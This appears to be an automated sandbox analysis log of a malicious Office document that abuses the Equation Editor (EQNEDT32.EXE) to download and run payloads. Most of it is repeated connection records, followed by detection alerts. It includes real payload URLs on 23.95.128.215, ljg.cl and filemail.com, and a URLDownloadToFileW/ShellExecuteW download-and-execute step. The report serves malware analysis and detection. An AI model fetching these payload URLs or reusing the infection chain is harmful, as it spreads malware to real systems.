    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49167
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 23.95.128.215:80 -> 192.168.2.22:49166
    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 23.95.128.215:80
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49168
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49169
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49170
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 152.231.102.107:443
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49170
    Source: global trafficTCP traffic: 152.231.102.107:443 -> 192.168.2.22:49170
    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 152.231.102.107:443

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49174 -> 23.95.128.215:80
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035705DC URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_035705DC
    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 193.30.119.205 193.30.119.205
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: global trafficHTTP traffic detected: GET /mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange&slice HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ljg.clConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.128.215Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.128.215Connection: Keep-Alive
    Source: unknownHTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49168 version: TLS 1.0
    Source: unknownHTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49169 version: TLS 1.0
    Source: unknownHTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49170 version: TLS 1.0
    Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49175 version: TLS 1.0
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: unknownTCP traffic detected without corresponding DNS query: 23.95.128.215
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035705DC URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_035705DC
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\821C5575.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange&slice HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ljg.clConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.128.215Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.128.215Connection: Keep-Alive
    Source: powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: global trafficDNS traffic detected: DNS query: ljg.cl
    Source: global trafficDNS traffic detected: DNS query: 3105.filemail.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 27 Nov 2024 16:56:16 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 27 Nov 2024 16:56:18 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
    Source: EQNEDT32.EXE, 00000009.00000002.456656505.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF
    Source: EQNEDT32.EXE, 00000009.00000002.456656505.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF?
    Source: EQNEDT32.EXE, 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIFj
    Source: powershell.exe, 0000000D.00000002.472460335.0000000005012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
